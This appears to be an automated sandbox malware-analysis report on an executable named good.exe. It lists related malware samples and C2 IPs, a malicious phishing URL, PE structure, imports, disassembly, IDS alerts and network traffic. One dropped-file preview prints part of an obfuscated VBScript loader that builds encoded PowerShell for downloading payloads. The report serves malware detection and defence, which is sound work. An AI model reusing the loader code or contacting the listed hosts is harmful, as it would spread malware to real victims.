 | https://g248jqtc.r.ap-south-1.awstrack.me/L0/https:%2F%2Ffub.direct%2F1%2Fwpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4WwWGYEcIFo0NTTfcu_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE%2Fhttps%2Fwestcommerce.com.br%2Fe63a%2F3274607708%2FSmartadvocate%2F%23%3Fnl=ZGF5aGFuYXJhQHNtYXJ0YWR2b2NhdGUuY29t/1/010901943144e678-be97f397-fbf4-4935-81cc-f9ffe0e007ba-000000/Ra9zEF9F5Gh7LdH-GSmxaBW3ylU=188 | malicious | ScreenConnect Tool | 185.166.143.49
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AMAZON-02US | Doc.exe | malicious | FormBook | 13.248.169.48
 | PO#3210046374.exe | malicious | FormBook | 13.248.169.48
 | Purchase Order sheet.xla.xlsx | malicious | Unknown | 54.252.88.45
 | 0000003323677.js | malicious | RevengeRAT | 13.49.66.229
 | Purchase Order sheet.xla.xlsx | malicious | Unknown | 54.252.88.45
 | Payment Advice.xls | malicious | Unknown | 18.197.190.144
 | Purchase Order sheet.xla.xlsx | malicious | Unknown | 18.184.20.38
 | Payment Advice.xls | malicious | Unknown | 18.184.20.38
 | Solicita#U00e7#U00e3o n#U00ba 9822342.js | malicious | RevengeRAT | 13.49.66.229
 | Purchase Order sheet.xla.xlsx | malicious | Unknown | 18.197.190.144
ASLINE-AS-APASLINELIMITEDHK | ZRc64MQ0nl.exe | malicious | Nitol | 107.148.149.107
 | zmpZMfK1b4.exe | malicious | CredGrabber, Meduza Stealer | 62.60.226.62
 | rEzX7eqgfo.exe | malicious | KeyLogger, StormKitty, VenomRAT | 62.60.226.26
 | 6.elf | malicious | Unknown | 62.60.239.47
 | fYT3jJZgOX.exe | malicious | Njrat | 154.197.69.14
 | la.bot.arm6.elf | malicious | Mirai | 180.223.114.199
 | pTvHtQDXio.exe | malicious | Amadey | 62.60.226.15
 | IGz.arm7.elf | malicious | Mirai | 213.176.118.46
 | sh4.xxx.elf | malicious | Gafgyt, Mirai | 185.177.25.107
 | i586.xxx.elf | malicious | Gafgyt, Mirai | 185.177.25.107
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | nicegirlkissedmewithloverissingmegoodgreatthings.hta | malicious | BlackHacker JS Obfuscator, Cobalt Strike, Remcos | 54.231.134.241, 185.166.143.48
 | 20250120.js | malicious | Unknown | 54.231.134.241, 185.166.143.48
 | uwmC39FNho.exe | malicious | Remcos | 54.231.134.241, 185.166.143.48
 | Docs PRE-ALERT 1978 Kgs - 3.exe | malicious | AgentTesla | 54.231.134.241, 185.166.143.48
 | Inquiry- HQ242654.exe | malicious | Snake Keylogger, VIP Keylogger | 54.231.134.241, 185.166.143.48
 | IMG_1050327.exe | malicious | AgentTesla | 54.231.134.241, 185.166.143.48
 | OZEKESSEVEN.20.01.2025.pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 54.231.134.241, 185.166.143.48
 | SGFDPPIOPP.exe | malicious | Snake Keylogger | 54.231.134.241, 185.166.143.48
 | https://jantaexpress.com/UyRV4rC | malicious | Unknown | 54.231.134.241, 185.166.143.48
 | Ref#2600902.exe | malicious | AgentTesla | 54.231.134.241, 185.166.143.48
                                                                                          No context
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):64
                                                                                          Entropy (8bit):1.1940658735648508
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Nlllulp77th:NllU
                                                                                          MD5:7B5F360646F3167812DC4ADF7B166512
                                                                                          SHA1:F00A325C611E6C9CC6D2069C0FEAE54C6B7E48E5
                                                                                          SHA-256:672CD1B39FD62CBC4EEAC339C7863E190A95CEF4DDCEF0F4A5BE946E098B63B0
                                                                                          SHA-512:7CA2CD8F0A6E6388628AC33A539DB661FCFFE08453DFACFE353B18B548ABC08072BF2FDAE40EEEA671137FE137177ADB4E322D9C77CDE8B6AADE7600EA4C18E0
                                                                                          Malicious:false
                                                                                          Preview:@...e.................................x..............@..........
                                                                                          Process:C:\Users\user\Desktop\good.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):14990
                                                                                          Entropy (8bit):5.438346483798337
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ciEjU3m2OhEHbEhiJC8ZOZg3jISajc7NF9Wu0MDxpnO/9v2f4I:hEiOy7918Zgrtv10MFpWv2fv
                                                                                          MD5:A56574DF53497ABAFF046A5D5DF0AE83
                                                                                          SHA1:44AA16D98C7E3D57EF02EB4E657B6A48A64BC47D
                                                                                          SHA-256:A570A8999D880F2F3BFB91902308DC65D6F6274717D9E52F7BF3E294477AA785
                                                                                          SHA-512:7DBFDF3675366230DFCCA5523351BADE4BEF45BAEE7B2D48E2B80F2E6CB8B829CAF71E03652E12C408BFEB850849EFC485275CBC8F53020FB55F5AE99B28E044
                                                                                          Malicious:true
                                                                                          Preview: 'g.. WScript.Sleep 20000..mmhmaAgmgoA = rRegisggfgdsadfkjhgjg211 & ""..kimAIjFcf = TimeSerial(9,8,9)..kimAIjFcf = TimeSerial(9,2,1)..kimAIjFcf = TimeSerial(2,2,1)..kimAIjFcf = TimeSerial(2,2,1)..kimAIjFcf = TimeSerial(2,2,1)..kimAIjFcf = TimeSerial(2,2,1)..kimAIjFcf = TimeSerial(2,2,1)..Call Ugsfisging("$do" & "sigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE")..Call Ugsfisging("@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0")..gimcfaSpo = TimeSerial(7,7,9)..Public Const AeebFmm = "phardniA"..fgIrfnmj = "hffhfg" & LenB("mojIkikb") & "hfg"..'dIomajkrp AbhjgdI..SAmSffjbj = TimeSerial(9,9,7)..Public Const Irmmbdgp = "AoiSFFmm"..Call Ugsfisging("@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6")..Call Ugsfisging("@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bw")..Call Ugsfisging("Bu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7")..adeecoer = TimeSerial(9,8,9)..Public Const nbmgjIA = "c
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                          Entropy (8bit):6.911938738434359
                                                                                          TrID:
                                                                                          • Win64 Executable GUI (202006/5) 92.65%
                                                                                          • Win64 Executable (generic) (12005/4) 5.51%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                          • DOS Executable Generic (2002/1) 0.92%
                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                          File name:good.exe
                                                                                          File size:164'352 bytes
                                                                                          MD5:1f060be9fbfe90811a71414791ab8c1b
                                                                                          SHA1:5ecbda765ea1c558ef61dc5933ab7aefc279e1b3
                                                                                          SHA256:b682165c83920ef53701d66dbc579701c402201b8dd0c150a7f3fff5195274fd
                                                                                          SHA512:88bebad5e5c6c067327ff13d8565ffd05f349587eac22fb91166c6df7cb1048075ba619a486481aa506a7478b09b082a1330fcf3f80a020e05b3d07feb9445bc
                                                                                          SSDEEP:3072:zahKyd2n31j5GWp1icKAArDZz4N9GhbkrNEkEnRI:zahOLp0yN90QEG
                                                                                          TLSH:6DF38D0FA6E860B6D478837045E302C35672B971576856FF22CEED795E232F07236B4A
                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D..e...6...6...6...7...6...7...6...7...6...7...6...6...6...7...6..o6...6...7...6Rich...6................PE..d................."
                                                                                          Icon Hash:3b6120282c4c5a1f
                                                                                          Entrypoint:0x140008200
                                                                                          Entrypoint Section:.text
                                                                                          Digitally signed:false
                                                                                          Imagebase:0x140000000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                          Time Stamp:0xAE1BC4F8 [Tue Jul 25 12:18:00 2062 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:
                                                                                          OS Version Major:10
                                                                                          OS Version Minor:0
                                                                                          File Version Major:10
                                                                                          File Version Minor:0
                                                                                          Subsystem Version Major:10
                                                                                          Subsystem Version Minor:0
                                                                                          Import Hash:4cea7ae85c87ddc7295d39ff9cda31d1
                                                                                          Instruction
                                                                                          dec eax
                                                                                          sub esp, 28h
                                                                                          call 00007F4F5126C3D0h
                                                                                          dec eax
                                                                                          add esp, 28h
                                                                                          jmp 00007F4F5126BC7Bh
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          dec eax
                                                                                          mov dword ptr [esp+08h], ebx
                                                                                          dec eax
                                                                                          mov dword ptr [esp+10h], edi
                                                                                          inc ecx
                                                                                          push esi
                                                                                          dec eax
                                                                                          sub esp, 000000B0h
                                                                                          and dword ptr [esp+20h], 00000000h
                                                                                          dec eax
                                                                                          lea ecx, dword ptr [esp+40h]
                                                                                          call dword ptr [000011CDh]
                                                                                          nop
                                                                                          dec eax
                                                                                          mov eax, dword ptr [00000030h]
                                                                                          dec eax
                                                                                          mov ebx, dword ptr [eax+08h]
                                                                                          xor edi, edi
                                                                                          xor eax, eax
                                                                                          dec eax
                                                                                          cmpxchg dword ptr [00004922h], ebx
                                                                                          je 00007F4F5126BC7Ch
                                                                                          dec eax
                                                                                          cmp eax, ebx
                                                                                          jne 00007F4F5126BC8Ch
                                                                                          mov edi, 00000001h
                                                                                          mov eax, dword ptr [00004918h]
                                                                                          cmp eax, 01h
                                                                                          jne 00007F4F5126BC89h
                                                                                          lea ecx, dword ptr [eax+1Eh]
                                                                                          call 00007F4F5126C263h
                                                                                          jmp 00007F4F5126BCECh
                                                                                          mov ecx, 000003E8h
                                                                                          call dword ptr [0000117Eh]
                                                                                          jmp 00007F4F5126BC39h
                                                                                          mov eax, dword ptr [000048F6h]
                                                                                          test eax, eax
                                                                                          jne 00007F4F5126BCCBh
                                                                                          mov dword ptr [000048E8h], 00000001h
                                                                                          dec esp
                                                                                          lea esi, dword ptr [000013E9h]
                                                                                          dec eax
                                                                                          lea ebx, dword ptr [000013CAh]
                                                                                          dec eax
                                                                                          mov dword ptr [esp+30h], ebx
                                                                                          mov dword ptr [esp+24h], eax
                                                                                          dec ecx
                                                                                          cmp ebx, esi
                                                                                          jnc 00007F4F5126BC97h
                                                                                          test eax, eax
                                                                                          jne 00007F4F5126BC97h
                                                                                          dec eax
                                                                                          cmp dword ptr [ebx], 00000000h
                                                                                          je 00007F4F5126BC82h
                                                                                          dec eax
                                                                                          mov eax, dword ptr [ebx]
                                                                                          dec eax
                                                                                          mov ecx, dword ptr [00001388h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa23c | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf000 | 0x1d0b4 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0xe000 | 0x408 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2d000 | 0x20 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x9a10 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x9010 | 0x118 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9128 | 0x520 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x7b80 | 0x7c00 | 60800deac1fde21b98089f2241ee6168 | False | 0.5499936995967742 | data | 6.096261782871538 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x9000 | 0x22c8 | 0x2400 | 59d15cdf89780817c3d48dd588a6a129 | False | 0.4136284722222222 | data | 4.727841929207054 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xc000 | 0x1f00 | 0x400 | 9d1580dccaf8e787a43caf4bba48a079 | False | 0.3212890625 | data | 3.1889769845125677 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0xe000 | 0x408 | 0x600 | 15cd12257317071f28e4f7b728f8825e | False | 0.3932291666666667 | data | 3.1563665040475675 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0xf000 | 0x1e000 | 0x1d200 | 1851dda2b6b63856da981589b51ae9d8 | False | 0.735221633583691 | data | 7.118009034793152 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x2d000 | 0x20 | 0x200 | 637787151ee546a94902de9694a58fd6 | False | 0.083984375 | data | 0.4068473715812382 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
AVI | 0xfa10 | 0x2e1a | RIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bpp | English | United States | 0.2713099474665311
RT_ICON | 0x1282c | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.3225609756097561
RT_ICON | 0x12e94 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.41263440860215056
RT_ICON | 0x1317c | 0x1e8 | Device independent bitmap graphic, 24 x 48 x 4, image size 288 | English | United States | 0.4569672131147541
RT_ICON | 0x13364 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.5574324324324325
RT_ICON | 0x1348c | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.6223347547974414
RT_ICON | 0x14334 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.7369133574007221
RT_ICON | 0x14bdc | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | English | United States | 0.783410138248848
RT_ICON | 0x152a4 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.3829479768786127
RT_ICON | 0x1580c | 0xd9d2 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 1.0004662673505254
RT_ICON | 0x231e0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.5300829875518672
RT_ICON | 0x25788 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.6137429643527205
RT_ICON | 0x26830 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.703688524590164
RT_ICON | 0x271b8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.425531914893617
RT_DIALOG | 0x27620 | 0x35c | data | Russian | Russia | 0.44534883720930235
RT_DIALOG | 0x2797c | 0x1b4 | data | Russian | Russia | 0.573394495412844
RT_DIALOG | 0x27b30 | 0x168 | data | Russian | Russia | 0.5361111111111111
RT_DIALOG | 0x27c98 | 0x1e0 | data | Russian | Russia | 0.55
RT_DIALOG | 0x27e78 | 0x150 | data | Russian | Russia | 0.5416666666666666
RT_DIALOG | 0x27fc8 | 0x122 | data | Russian | Russia | 0.5793103448275863
RT_STRING | 0x280ec | 0x86 | Matlab v4 mat-file (little endian) K\0041\0045\004@\0048\004B\0045\004 , numeric, rows 0, columns 0 | Russian | Russia | 0.7164179104477612
RT_STRING | 0x28174 | 0x52e | data | Russian | Russia | 0.39441930618401205
RT_STRING | 0x286a4 | 0x592 | data | Russian | Russia | 0.4011220196353436
RT_STRING | 0x28c38 | 0x4b2 | data | Russian | Russia | 0.3910149750415973
RT_STRING | 0x290ec | 0x43e | data | Russian | Russia | 0.4567219152854512
                                                                                          RT_STRING0x2952c0x2fcdataRussianRussia0.4424083769633508
                                                                                          RT_RCDATA0x298280x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                                                                                          RT_RCDATA0x298300x174aMicrosoft Cabinet archive data, Windows 2000/XP setup, 5962 bytes, 1 file, at 0x2c +A "fwr.vbs", ID 712, number 1, 1 datablock, 0x1503 compressionRussianRussia1.0018450184501846
                                                                                          RT_RCDATA0x2af7c0x4dataRussianRussia3.0
                                                                                          RT_RCDATA0x2af800x24dataRussianRussia0.7222222222222222
                                                                                          RT_RCDATA0x2afa40x7ASCII text, with no line terminatorsRussianRussia2.142857142857143
                                                                                          RT_RCDATA0x2afac0x7ASCII text, with no line terminatorsRussianRussia2.142857142857143
                                                                                          RT_RCDATA0x2afb40x4dataRussianRussia3.0
                                                                                          RT_RCDATA0x2afb80x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                                                                                          RT_RCDATA0x2afc00x4dataRussianRussia3.0
                                                                                          RT_RCDATA0x2afc40x13ASCII text, with no line terminatorsEnglishUnited States1.4210526315789473
                                                                                          RT_RCDATA0x2afd80x4dataRussianRussia3.0
                                                                                          RT_RCDATA0x2afdc0x8dataRussianRussia2.0
                                                                                          RT_RCDATA0x2afe40x7ASCII text, with no line terminatorsRussianRussia2.142857142857143
                                                                                          RT_RCDATA0x2afec0x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                                                                                          RT_GROUP_ICON0x2aff40xbcdataEnglishUnited States0.6117021276595744
                                                                                          RT_VERSION0x2b0b00x400dataEnglishUnited States0.416015625
                                                                                          RT_VERSION0x2b4b00x41cdataRussianRussia0.46577946768060835
                                                                                          RT_MANIFEST0x2b8cc0x7e6XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.37734915924826906
DLL | Import
ADVAPI32.dll | GetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
KERNEL32.dll | _lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, LoadLibraryExA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, WaitForSingleObject, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, ExpandEnvironmentStringsA, LocalAlloc, lstrcmpA, FindNextFileA, GetCurrentProcess, FindFirstFileA, GetModuleFileNameA, GetShortPathNameA, Sleep, GetStartupInfoW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, GetTickCount, EnumResourceLanguagesA, GetDiskFreeSpaceA, MulDiv, FindClose
GDI32.dll | GetDeviceCaps
USER32.dll | ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetSystemMetrics, CallWindowProcA, SetWindowTextA, MessageBoxA, SendDlgItemMessageA, SendMessageA, GetDlgItem, DialogBoxIndirectParamA, GetWindowLongPtrA, SetWindowLongPtrA, SetForegroundWindow, ReleaseDC, EnableWindow, CharNextA, LoadStringA, CharPrevA, EndDialog, MessageBeep, ExitWindowsEx, SetDlgItemTextA, CharUpperA, GetDesktopWindow, PeekMessageA, GetDlgItemTextA
msvcrt.dll | ?terminate@@YAXXZ, _commode, _fmode, _acmdln, __C_specific_handler, memset, __setusermatherr, _ismbblead, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, _XcptFilter, memcpy_s, _vsnprintf, _initterm, memcpy
COMCTL32.dll |
Cabinet.dll |
VERSION.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
Language of compilation system | Country where language is spoken | Map
English | United States |
Russian | Russia |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-20T15:48:50.614088+0100 | 2057635 | ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound | 1 | 62.60.226.64 | 80 | 192.168.2.4 | 49739 | TCP
2025-01-20T15:49:13.952121+0100 | 2049038 | ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 | 1 | 54.231.134.241 | 443 | 192.168.2.4 | 49738 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 20, 2025 15:49:10.553081036 CET | 49737 | 443 | 192.168.2.4 | 185.166.143.48
Jan 20, 2025 15:49:10.553174973 CET | 443 | 49737 | 185.166.143.48 | 192.168.2.4
Jan 20, 2025 15:49:10.553288937 CET | 49737 | 443 | 192.168.2.4 | 185.166.143.48
Jan 20, 2025 15:49:10.560729027 CET | 49737 | 443 | 192.168.2.4 | 185.166.143.48
Jan 20, 2025 15:49:10.560765028 CET | 443 | 49737 | 185.166.143.48 | 192.168.2.4
Jan 20, 2025 15:49:11.292211056 CET | 443 | 49737 | 185.166.143.48 | 192.168.2.4
Jan 20, 2025 15:49:11.292372942 CET | 49737 | 443 | 192.168.2.4 | 185.166.143.48
Jan 20, 2025 15:49:11.296483994 CET | 49737 | 443 | 192.168.2.4 | 185.166.143.48
Jan 20, 2025 15:49:11.296508074 CET | 443 | 49737 | 185.166.143.48 | 192.168.2.4
Jan 20, 2025 15:49:11.296883106 CET | 443 | 49737 | 185.166.143.48 | 192.168.2.4
Jan 20, 2025 15:49:11.302537918 CET | 49737 | 443 | 192.168.2.4 | 185.166.143.48
Jan 20, 2025 15:49:11.343338966 CET | 443 | 49737 | 185.166.143.48 | 192.168.2.4
Jan 20, 2025 15:49:11.766084909 CET | 443 | 49737 | 185.166.143.48 | 192.168.2.4
Jan 20, 2025 15:49:11.766154051 CET | 443 | 49737 | 185.166.143.48 | 192.168.2.4
Jan 20, 2025 15:49:11.766187906 CET | 49737 | 443 | 192.168.2.4 | 185.166.143.48
Jan 20, 2025 15:49:11.766239882 CET | 443 | 49737 | 185.166.143.48 | 192.168.2.4
Jan 20, 2025 15:49:11.766288996 CET | 49737 | 443 | 192.168.2.4 | 185.166.143.48
Jan 20, 2025 15:49:11.766309977 CET | 443 | 49737 | 185.166.143.48 | 192.168.2.4
Jan 20, 2025 15:49:11.766386986 CET | 49737 | 443 | 192.168.2.4 | 185.166.143.48
Jan 20, 2025 15:49:11.766422987 CET | 443 | 49737 | 185.166.143.48 | 192.168.2.4
Jan 20, 2025 15:49:11.766468048 CET | 49737 | 443 | 192.168.2.4 | 185.166.143.48
Jan 20, 2025 15:49:11.770987988 CET | 49737 | 443 | 192.168.2.4 | 185.166.143.48
Jan 20, 2025 15:49:11.803128958 CET | 49738 | 443 | 192.168.2.4 | 54.231.134.241
Jan 20, 2025 15:49:11.803172112 CET | 443 | 49738 | 54.231.134.241 | 192.168.2.4
Jan 20, 2025 15:49:11.803407907 CET | 49738 | 443 | 192.168.2.4 | 54.231.134.241
Jan 20, 2025 15:49:11.803641081 CET | 49738 | 443 | 192.168.2.4 | 54.231.134.241
Jan 20, 2025 15:49:11.803652048 CET | 443 | 49738 | 54.231.134.241 | 192.168.2.4
Jan 20, 2025 15:49:12.373135090 CET | 443 | 49738 | 54.231.134.241 | 192.168.2.4
Jan 20, 2025 15:49:12.373233080 CET | 49738 | 443 | 192.168.2.4 | 54.231.134.241
Jan 20, 2025 15:49:12.374839067 CET | 49738 | 443 | 192.168.2.4 | 54.231.134.241
Jan 20, 2025 15:49:12.374857903 CET | 443 | 49738 | 54.231.134.241 | 192.168.2.4
Jan 20, 2025 15:49:12.375308990 CET | 443 | 49738 | 54.231.134.241 | 192.168.2.4
Jan 20, 2025 15:49:12.376377106 CET | 49738 | 443 | 192.168.2.4 | 54.231.134.241
Jan 20, 2025 15:49:12.423333883 CET | 443 | 49738 | 54.231.134.241 | 192.168.2.4
Jan 20, 2025 15:49:12.531409979 CET | 443 | 49738 | 54.231.134.241 | 192.168.2.4
Jan 20, 2025 15:49:12.536241055 CET | 443 | 49738 | 54.231.134.241 | 192.168.2.4
Jan 20, 2025 15:49:12.536289930 CET | 443 | 49738 | 54.231.134.241 | 192.168.2.4
Jan 20, 2025 15:49:12.536382914 CET | 49738 | 443 | 192.168.2.4 | 54.231.134.241
Jan 20, 2025 15:49:12.536401987 CET | 443 | 49738 | 54.231.134.241 | 192.168.2.4
Jan 20, 2025 15:49:12.536420107 CET | 49738 | 443 | 192.168.2.4 | 54.231.134.241
Jan 20, 2025 15:49:12.536464930 CET | 49738 | 443 | 192.168.2.4 | 54.231.134.241
Jan 20, 2025 15:49:12.536484003 CET | 443 | 49738 | 54.231.134.241 | 192.168.2.4
Jan 20, 2025 15:49:12.536540031 CET | 49738 | 443 | 192.168.2.4 | 54.231.134.241
Jan 20, 2025 15:49:12.624150038 CET | 443 | 49738 | 54.231.134.241 | 192.168.2.4
Jan 20, 2025 15:49:12.624187946 CET | 443 | 49738 | 54.231.134.241 | 192.168.2.4
Jan 20, 2025 15:49:12.624228954 CET | 443 | 49738 | 54.231.134.241 | 192.168.2.4
Jan 20, 2025 15:49:12.624407053 CET | 49738 | 443 | 192.168.2.4 | 54.231.134.241
Jan 20, 2025 15:49:12.624434948 CET | 443 | 49738 | 54.231.134.241 | 192.168.2.4
Jan 20, 2025 15:49:12.625288010 CET | 443 | 49738 | 54.231.134.241 | 192.168.2.4
Jan 20, 2025 15:49:12.625315905 CET | 443 | 49738 | 54.231.134.241 | 192.168.2.4
Jan 20, 2025 15:49:12.625370979 CET | 49738 | 443 | 192.168.2.4 | 54.231.134.241
Jan 20, 2025 15:49:12.625391006 CET | 443 | 49738 | 54.231.134.241 | 192.168.2.4
Jan 20, 2025 15:49:12.625413895 CET | 49738 | 443 | 192.168.2.4 | 54.231.134.241
Jan 20, 2025 15:49:12.625997066 CET | 443 | 49738 | 54.231.134.241 | 192.168.2.4
Jan 20, 2025 15:49:12.626050949 CET | 49738 | 443 | 192.168.2.4 | 54.231.134.241
Jan 20, 2025 15:49:12.626061916 CET | 443 | 49738 | 54.231.134.241 | 192.168.2.4
Jan 20, 2025 15:49:12.676645994 CET | 49738 | 443 | 192.168.2.4 | 54.231.134.241
Jan 20, 2025 15:49:12.711846113 CET | 443 | 49738 | 54.231.134.241 | 192.168.2.4
Jan 20, 2025 15:49:12.712012053 CET | 49738 | 443 | 192.168.2.4 | 54.231.134.241
Jan 20, 2025 15:49:12.712044001 CET | 443 | 49738 | 54.231.134.241 | 192.168.2.4
Jan 20, 2025 15:49:12.712974072 CET | 443 | 49738 | 54.231.134.241 | 192.168.2.4
